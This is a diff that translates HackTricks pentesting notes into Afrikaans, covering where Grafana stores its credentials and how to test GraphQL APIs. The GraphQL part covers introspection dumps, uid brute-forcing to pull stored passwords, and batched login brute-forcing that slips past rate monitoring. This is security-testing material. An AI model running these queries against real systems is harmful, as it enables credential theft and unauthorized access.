-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Interesting stuff +## Interessante dinge -* The file **`/etc/grafana/grafana.ini`** can contain sensitive information such as **admin** **username** and **password.** -* Inside the platform you could **invite people** or **generate API keys** (might need to be admin) -* You could check which plugins are installed (or even install new) -* By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`** - * `select user,password,database from data_source;` +* Die lêer **`/etc/grafana/grafana.ini`** kan sensitiewe inligting bevat soos die **admin** **gebruikersnaam** en **wagwoord**. +* Binne die platform kan jy **mense uitnooi** of **API-sleutels genereer** (moontlik as admin) +* Jy kan nagaan watter plugins geïnstalleer is (of selfs nuwe installeer) +* Standaard gebruik dit die **SQLite3**-databasis in **`/var/lib/grafana/grafana.db`** +* `select user,password,database from data_source;`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
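Review bot: The nested list item loses its indentation in this hunk: `-    * \`select user,password,database from data_source;\`` becomes `+* \`select user,password,database from data_source;\`` at column 0, so the SQL query reads as a standalone bullet instead of the sub-item of the SQLite3 database entry (`/var/lib/grafana/grafana.db`) it belongs to. Restore the four leading spaces so the hierarchy is preserved.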
diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md index a5f14f057..95a53722f 100644 --- a/network-services-pentesting/pentesting-web/graphql.md +++ b/network-services-pentesting/pentesting-web/graphql.md @@ -2,29 +2,29 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Introduction +## Inleiding -GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes. +GraphQL word **beklemtoon** as 'n **doeltreffende alternatief** vir REST API, wat 'n vereenvoudigde benadering bied vir die opvraag van data vanaf die agterkant. In teenstelling met REST, wat dikwels verskeie versoekings oor verskillende eindpunte vereis om data te versamel, maak GraphQL dit moontlik om alle benodigde inligting deur 'n **enkele versoek** te haal. Hierdie stroomlynproses bied aansienlike **voordele vir ontwikkelaars** deur die ingewikkeldheid van hul data-opvraagprosesse te verminder. -## GraphQL and Security +## GraphQL en Sekuriteit -With the advent of new technologies, including GraphQL, new security vulnerabilities also emerge. A key point to note is that **GraphQL does not include authentication mechanisms by default**. It's the responsibility of developers to implement such security measures. Without proper authentication, GraphQL endpoints may expose sensitive information to unauthenticated users, posing a significant security risk. +Met die opkoms van nuwe tegnologieë, insluitend GraphQL, ontstaan ook nuwe sekuriteitskwesbaarhede. 'n Belangrike punt om op te let is dat **GraphQL nie outomaties outentiseringsmeganismes insluit nie**. Dit is die verantwoordelikheid van ontwikkelaars om sulke sekuriteitsmaatreëls te implementeer. Sonder behoorlike outentisering kan GraphQL-eindpunte sensitiewe inligting aan ongeoutentiseerde gebruikers blootstel, wat 'n aansienlike sekuriteitsrisiko inhou. 
-### Directory Brute Force Attacks and GraphQL +### Gids vir Brute Force-aanvalle en GraphQL -To identify exposed GraphQL instances, the inclusion of specific paths in directory brute force attacks is recommended. These paths are: +Om blootgestelde GraphQL-instanties te identifiseer, word die insluiting van spesifieke paaie in brute force-aanvalle aanbeveel. Hierdie paaie is: - `/graphql` - `/graphiql` 
@@ -35,33 +35,29 @@ To identify exposed GraphQL instances, the inclusion of specific paths in direct - `/graphql/api` - `/graphql/graphql` -Identifying open GraphQL instances allows for the examination of supported queries. This is crucial for understanding the data accessible through the endpoint. GraphQL's introspection system facilitates this by detailing the queries a schema supports. For more information on this, refer to the GraphQL documentation on introspection: [**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/) +Die identifisering van oop GraphQL-instanties maak dit moontlik om ondersteunde navrae te ondersoek. Dit is noodsaaklik om die data wat toeganklik is deur die eindpunt te verstaan. GraphQL se introspeksiestelsel fasiliteer dit deur die navrae wat 'n skema ondersteun, in detail te beskryf. Vir meer inligting hieroor, verwys na die GraphQL-dokumentasie oor introspeksie: [**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/) -### Fingerprint +### Vingerafdruk -The tool [**graphw00f**](https://github.com/dolevf/graphw00f) is capable to detect wich GraphQL engine is used in a server and then prints some helpful information for the security auditor. +Die instrument [**graphw00f**](https://github.com/dolevf/graphw00f) is in staat om te bepaal watter GraphQL-enjin in 'n bediener gebruik word en druk dan nuttige inligting vir die sekuriteitsouditeur af. -#### Universal queries - -To check if a URL is a GraphQL service, a **universal query**, `query{__typename}`, can be sent. If the response includes `{"data": {"__typename": "Query"}}`, it confirms the URL hosts a GraphQL endpoint. This method relies on GraphQL's `__typename` field, which reveals the type of the queried object. +#### Universele navrae +Om te bepaal of 'n URL 'n GraphQL-diens is, kan 'n **universele navraag**, `query{__typename}`, gestuur word. 
As die respons `{"data": {"__typename": "Query"}}` insluit, bevestig dit dat die URL 'n GraphQL-eindpunt huisves. Hierdie metode maak gebruik van GraphQL se `__typename`-veld, wat die tipe van die ondervraagde objek onthul. ```javascript query{__typename} ``` +### Basiese Enumerasie -### Basic Enumeration +Graphql ondersteun gewoonlik **GET**, **POST** (x-www-form-urlencoded) en **POST**(json). Alhoewel dit vir sekuriteit aanbeveel word om slegs json toe te laat om CSRF-aanvalle te voorkom. -Graphql usually supports **GET**, **POST** (x-www-form-urlencoded) and **POST**(json). Although for security it's recommended to only allow json to prevent CSRF attacks. - -#### Introspection - -To use introspection to discover schema information, query the `__schema` field. This field is available on the root type of all queries. +#### Introspeksie +Om introspeksie te gebruik om skemasinligting te ontdek, ondersoek die `__schema` veld. Hierdie veld is beskikbaar op die wortel tipe van alle navrae. ```bash query={__schema{types{name,fields{name}}}} ``` - -With this query you will find the name of all the types being used: +Met hierdie navraag sal jy die naam van al die tipes wat gebruik word, vind: ![](<../../.gitbook/assets/image (202).png>) 
@@ -71,460 +67,424 @@ query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofTy ``` {% endcode %} -With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to query the database. +Met hierdie navraag kan jy al die tipes, hul velde en hul argumente (en die tipe van die argumente) onttrek. Dit sal baie nuttig wees om te weet hoe om die databasis te ondervra. ![](<../../.gitbook/assets/image (207) (3).png>) -**Errors** - -It's interesting to know if the **errors** are going to be **shown** as they will contribute with useful **information.** +**Foute** +Dit is interessant om te weet of die **foute** gaan **verskyn** aangesien dit nuttige **inligting** kan verskaf. ``` ?query={__schema} ?query={} ?query={thisdefinitelydoesnotexist} ``` - ![](<../../.gitbook/assets/image (205) (1).png>) -**Enumerate Database Schema via Introspection** +**Bepaal Databasis Skema deur Introspeksie** {% hint style="info" %} -If introspection is enabled but the above query doesn't run, try removing the `onOperation`, `onFragment`, and `onField` directives from the query structure. +As introspeksie geaktiveer is, maar die bogenoemde navraag nie uitgevoer word nie, probeer om die `onOperation`, `onFragment`, en `onField` riglyne uit die navraagstruktuur te verwyder. 
{% endhint %} - ```bash - #Full introspection query +#Full introspection query query IntrospectionQuery { - __schema { - queryType { - name - } - mutationType { - name - } - subscriptionType { - name - } - types { - ...FullType - } - directives { - name - description - args { - ...InputValue - } - onOperation #Often needs to be deleted to run query - onFragment #Often needs to be deleted to run query - onField #Often needs to be deleted to run query - } - } +__schema { +queryType { +name +} +mutationType { +name +} +subscriptionType { +name +} +types { +...FullType +} +directives { +name +description +args { +...InputValue +} +onOperation #Often needs to be deleted to run query +onFragment #Often needs to be deleted to run query +onField #Often needs to be deleted to run query +} +} } fragment FullType on __Type { - kind - name - description - fields(includeDeprecated: true) { - name - description - args { - ...InputValue - } - type { - ...TypeRef - } - isDeprecated - deprecationReason - } - inputFields { - ...InputValue - } - interfaces { - ...TypeRef - } - enumValues(includeDeprecated: true) { - name - description - isDeprecated - deprecationReason - } - possibleTypes { - ...TypeRef - } +kind +name +description +fields(includeDeprecated: true) { +name +description +args { +...InputValue +} +type { +...TypeRef +} +isDeprecated +deprecationReason +} +inputFields { +...InputValue +} +interfaces { +...TypeRef +} +enumValues(includeDeprecated: true) { +name +description +isDeprecated +deprecationReason +} +possibleTypes { +...TypeRef +} } fragment InputValue on __InputValue { - name - description - type { - ...TypeRef - } - defaultValue +name +description +type { +...TypeRef +} +defaultValue } fragment TypeRef on __Type { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - } - } - } +kind +name +ofType { +kind +name +ofType { +kind +name +ofType { +kind +name +} +} +} } ``` - -Inline introspection query: - +Inline introspeksie 
navraag: ``` /?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%
20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+} ``` - -The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...) +Die laaste reël kode is 'n graphql-navraag wat alle meta-inligting van die graphql sal dump (voorwerpe name, parameters, tipes...) ![](<../../.gitbook/assets/image (206).png>) -If introspection is enabled you can use [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) to view in a GUI all the options. +As introspeksie geaktiveer is, kan jy [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) gebruik om in 'n GUI al die opsies te sien. -### Querying +### Navraag -Now that we know which kind of information is saved inside the database, let's try to **extract some values**. +Nou dat ons weet watter soort inligting binne die databasis gestoor word, laat ons probeer om **sekere waardes te onttrek**. -In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object. +In die introspeksie kan jy vind **watter voorwerp jy direk kan navraag doen** (omdat jy nie 'n voorwerp kan navraag doen net omdat dit bestaan nie). In die volgende prentjie kan jy sien dat die "_queryType_" "_Query_" genoem word en dat een van die velde van die "_Query_" voorwerp "_flags_" is, wat ook 'n tipe voorwerp is. Jy kan dus die vlag-voorwerp navraag doen. 
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png) -Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below: +Let daarop dat die tipe van die navraag "_flags_" "_Flags_" is, en hierdie voorwerp word as volg gedefinieer: ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png) -You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query: - +Jy kan sien dat die "_Flags_" voorwerpe saamgestel is uit **naam** en **waarde**. Jy kan dus al die name en waardes van die vlae kry met die navraag: ```javascript query={flags{name, value}} ``` - -Note that in case the **object to query** is a **primitive** **type** like **string** like in the following example +Let wel dat as die **objek om te ondervra** 'n **primitiewe** **tipe** soos **string** is, soos in die volgende voorbeeld ![](<../../.gitbook/assets/image (441).png>) -You can just query is with: - +Jy kan dit net ondervra met: ```javascript query={hiddenFlags} ``` - -In another example where there were 2 objects inside the "_Query_" type object: "_user_" and "_users_".\ -If these objects don't need any argument to search, could **retrieve all the information from them** just **asking** for the data you want. In this example from Internet you could extract the saved usernames and passwords: +In 'n ander voorbeeld waar daar 2 voorwerpe binne die "_Query_" tipe voorwerp was: "_user_" en "_users_". As hierdie voorwerpe nie enige argument nodig het om te soek nie, kan jy **alle inligting van hulle kry** deur net vir die data te vra wat jy wil hê. 
In hierdie voorbeeld van die internet kan jy die gestoorde gebruikersname en wagwoorde onttrek: ![](<../../.gitbook/assets/image (208).png>) -However, in this example if you try to do so you get this **error**: +Maar in hierdie voorbeeld kry jy 'n **fout** as jy dit probeer doen: ![](<../../.gitbook/assets/image (210).png>) -Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.\ -Anyway, we already knew that, in the [Basic Enumeration](graphql.md#basic-enumeration) section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}` +Dit lyk asof dit op een of ander manier sal soek deur die "_**uid**_" argument van die tipe _**Int**_ te gebruik. In elk geval het ons alreeds geweet dat in die [Basiese Enumerasie](graphql.md#basic-enumeration) afdeling 'n navraag voorgestel is wat ons al die nodige inligting gewys het: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}` -If you read the image provided when I run that query you will see that "_**user**_" had the **arg** "_**uid**_" of type _Int_. +As jy die verskafte prentjie lees wanneer ek daardie navraag uitvoer, sal jy sien dat "_**user**_" die **arg** "_**uid**_" van die tipe _Int_ gehad het. 
-So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:\ +Dus, deur 'n ligte _**uid**_ bruteforce uit te voer, het ek gevind dat in _**uid**=**1**_ 'n gebruikersnaam en 'n wagwoord opgehaal is:\ `query={user(uid:1){user,password}}` ![](<../../.gitbook/assets/image (211).png>) -Note that I **discovered** that I could ask for the **parameters** "_**user**_" and "_**password**_" because if I try to look for something that doesn't exist (`query={user(uid:1){noExists}}`) I get this error: +Let daarop dat ek **ontdek** het dat ek vir die **parameters** "_**user**_" en "_**password**_" kon vra omdat as ek probeer soek vir iets wat nie bestaan nie (`query={user(uid:1){noExists}}`) kry ek hierdie fout: ![](<../../.gitbook/assets/image (213).png>) -And during the **enumeration phase** I discovered that the "_**dbuser**_" object had as fields "_**user**_" and "_**password**_. +En tydens die **enumerasie fase** het ek ontdek dat die "_**dbuser**_" voorwerp as velde "_**user**_" en "_**password**_ het. -**Query string dump trick (thanks to @BinaryShadow\_)** +**Navraag string dump truuk (dankie aan @BinaryShadow\_)** -If you can search by a string type, like: `query={theusers(description: ""){username,password}}` and you **search for an empty string** it will **dump all data**. (_Note this example isn't related with the example of the tutorials, for this example suppose you can search using "**theusers**" by a String field called "**description**"_). +As jy kan soek volgens 'n string tipe, soos: `query={theusers(description: ""){username,password}}` en jy **soek vir 'n leë string**, sal dit **alle data dump**. (_Let wel, hierdie voorbeeld het niks te doen met die voorbeeld van die tutoriale nie, vir hierdie voorbeeld aanvaar ons dat jy kan soek deur "**theusers**" te gebruik volgens 'n String veld genaamd "**description**"_). 
-### Searching +### Soek -In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database. - -You can **search** persons **by** the **name** and get their emails: +In hierdie opset bevat 'n **databasis** **persone** en **flieks**. **Persone** word geïdentifiseer deur hul **e-pos** en **naam**; **flieks** deur hul **naam** en **gradering**. **Persone** kan vriende wees met mekaar en het ook flieks, wat verhoudings binne die databasis aandui. +Jy kan persone **soek** volgens die **naam** en hul e-posse kry: ```javascript { - searchPerson(name: "John Doe") { - email - } +searchPerson(name: "John Doe") { +email +} } ``` - -You can **search** persons **by** the **name** and get their **subscribed** **films**: - +Jy kan **soek** na persone **volgens** hul **naam** en hul **geabonneerde** **flieks** kry: ```javascript { - searchPerson(name: "John Doe") { - email - subscribedMovies { - edges { - node { - name - } - } - } - } +searchPerson(name: "John Doe") { +email +subscribedMovies { +edges { +node { +name +} +} +} +} } ``` +Merk op hoe dit aangedui word om die `name` van die `subscribedMovies` van die persoon te herwin. -Note how its indicated to retrieve the `name` of the `subscribedMovies` of the person. - -You can also **search several objects at the same time**. In this case, a search 2 movies is done: - +Jy kan ook **veral verskeie objekte gelyktydig soek**. 
In hierdie geval word 'n soektog na 2 flieks gedoen: ```javascript { - searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) { - name - } +searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) { +name +} }r ``` - -Or even **relations of several different objects using aliases**: - +Of selfs **verhoudings van verskeie verskillende voorwerpe deur gebruik te maak van aliase**: ```javascript { - johnsMovieList: searchPerson(name: "John Doe") { - subscribedMovies { - edges { - node { - name - } - } - } - } - davidsMovieList: searchPerson(name: "David Smith") { - subscribedMovies { - edges { - node { - name - } - } - } - } +johnsMovieList: searchPerson(name: "John Doe") { +subscribedMovies { +edges { +node { +name +} +} +} +} +davidsMovieList: searchPerson(name: "David Smith") { +subscribedMovies { +edges { +node { +name +} +} +} +} } ``` +### Mutaties -### Mutations +**Mutaties word gebruik om veranderinge aan die bedienerkant te maak.** -**Mutations are used to make changes in the server-side.** - -In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case): +In die **introspeksie** kan jy die **verklaarde** **mutaties** vind. In die volgende prentjie word die "_MutationType_" genoem "_Mutation_" en die "_Mutation_" objek bevat die name van die mutasies (soos "_addPerson_" in hierdie geval): ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png) -In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database. 
- -A mutation to **create new** movies inside the database can be like the following one (in this example the mutation is called `addMovie`): +In hierdie opset bevat 'n **databasis** **persone** en **flieks**. **Persone** word geïdentifiseer deur hul **e-pos** en **naam**; **flieks** deur hul **naam** en **gradering**. **Persone** kan vriende wees met mekaar en het ook flieks, wat verhoudings binne die databasis aandui. +'n Mutasie om nuwe flieks in die databasis te **skep** kan soos die volgende wees (in hierdie voorbeeld word die mutasie "addMovie" genoem): ```javascript mutation { - addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) { - movies { - name - rating - } - } +addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) { +movies { +name +rating +} +} } ``` +**Let daarop hoe beide die waardes en tipe van data in die navraag aangedui word.** -**Note how both the values and type of data are indicated in the query.** - -Additionally, the database supports a **mutation** operation, named `addPerson`, which allows for the creation of **persons** along with their associations to existing **friends** and **movies**. It's crucial to note that the friends and movies must pre-exist in the database before linking them to the newly created person. - +Daarbenewens ondersteun die databasis 'n **mutasie**-operasie, genaamd `addPerson`, wat die skepping van **persone** saam met hul assosiasies tot bestaande **vriende** en **flieks** moontlik maak. Dit is belangrik om daarop te let dat die vriende en flieks reeds in die databasis moet bestaan voordat hulle aan die nuutgeskepte persoon gekoppel kan word. 
```javascript mutation { - addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) { - person { - name - email - friends { - edges { - node { - name - email - } - } - } - subscribedMovies { - edges { - node { - name - rating - releaseYear - } - } - } - } - } +addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) { +person { +name +email +friends { +edges { +node { +name +email +} +} +} +subscribedMovies { +edges { +node { +name +rating +releaseYear +} +} +} +} +} } ``` - ### Batching brute-force in 1 API request -This information was take from [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).\ -Authentication through GraphQL API with **simultaneously sending many queries with different credentials** to check it. It’s a classic brute force attack, but now it’s possible to send more than one login/password pair per HTTP request because of the GraphQL batching feature. This approach would trick external rate monitoring applications into thinking all is well and there is no brute-forcing bot trying to guess passwords. +Hierdie inligting is geneem vanaf [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).\ +Verifikasie deur middel van GraphQL API met **gelyktydige stuur van baie navrae met verskillende geloofsbriewe** om dit te toets. Dit is 'n klassieke brute force-aanval, maar nou is dit moontlik om meer as een login/wagwoord-paar per HTTP-aanvraag te stuur as gevolg van die GraphQL-batchingfunksie. 
Hierdie benadering sal eksterne tariefmoniteringsprogramme laat dink dat alles reg is en dat daar geen brute force-bot is wat wagwoorde probeer raai nie. -Below you can find the simplest demonstration of an application authentication request, with **3 different email/passwords pairs at a time**. Obviously it’s possible to send thousands in a single request in the same way: +Hieronder vind jy die eenvoudigste demonstrasie van 'n aansoekverifikasie-aanvraag, met **3 verskillende e-pos/wagwoord-pare op 'n slag**. Dit is vanselfsprekend moontlik om duisende in een enkele aanvraag op dieselfde manier te stuur: ![](<../../.gitbook/assets/image (182) (1).png>) -As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token. +Soos ons kan sien uit die antwoordskermkiekie, het die eerste en derde aanvrae _null_ teruggegee en die ooreenstemmende inligting in die _error_ -gedeelte weerspieël. Die **tweede mutasie het die korrekte verifikasie** -data gehad en die antwoord het die korrekte verifikasie-sessie-token. ![](<../../.gitbook/assets/image (119) (1).png>) -## GraphQL Without Introspection +## GraphQL Sonder Introspeksie -More and more **graphql endpoints are disabling introspection**. However, the errors that graphql throws when an unexpected request is received are enough for tools like [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) to recreate most part of the schema. +Meer en meer **graphql-eindpunte deaktiveer introspeksie**. Die foute wat graphql gooi wanneer 'n onverwagte versoek ontvang word, is egter genoeg vir gereedskap soos [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) om die meeste van die skema te herskep. 
-Moreover, the Burp Suite extension [**GraphQuail**](https://github.com/forcesunseen/graphquail) extension **observes GraphQL API requests going through Burp** and **builds** an internal GraphQL **schema** with each new query it sees. It can also expose the schema for GraphiQL and Voyager. The extension returns a fake response when it receives an introspection query. As a result, GraphQuail shows all queries, arguments, and fields available for use within the API. For more info [**check this**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema). +Verder, die Burp Suite-uitbreiding [**GraphQuail**](https://github.com/forcesunseen/graphquail) **observeer GraphQL API-aanvrae wat deur Burp gaan** en **bou** 'n interne GraphQL **skema** met elke nuwe navraag wat dit sien. Dit kan ook die skema blootstel vir GraphiQL en Voyager. Die uitbreiding gee 'n vals antwoord wanneer dit 'n introspeksie-navraag ontvang. As gevolg hiervan wys GraphQuail alle navrae, argumente en velde wat beskikbaar is vir gebruik binne die API. Vir meer inligting [**kyk hierdie**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema). -A nice **wordlist** to discover [**GraphQL entities can be found here**](https://github.com/Escape-Technologies/graphql-wordlist?). +'n Goeie **woordelys** om [**GraphQL-entiteite te ontdek kan hier gevind word**](https://github.com/Escape-Technologies/graphql-wordlist?). ### Bypassing GraphQL introspection defences ### **Bypassing GraphQL Introspection 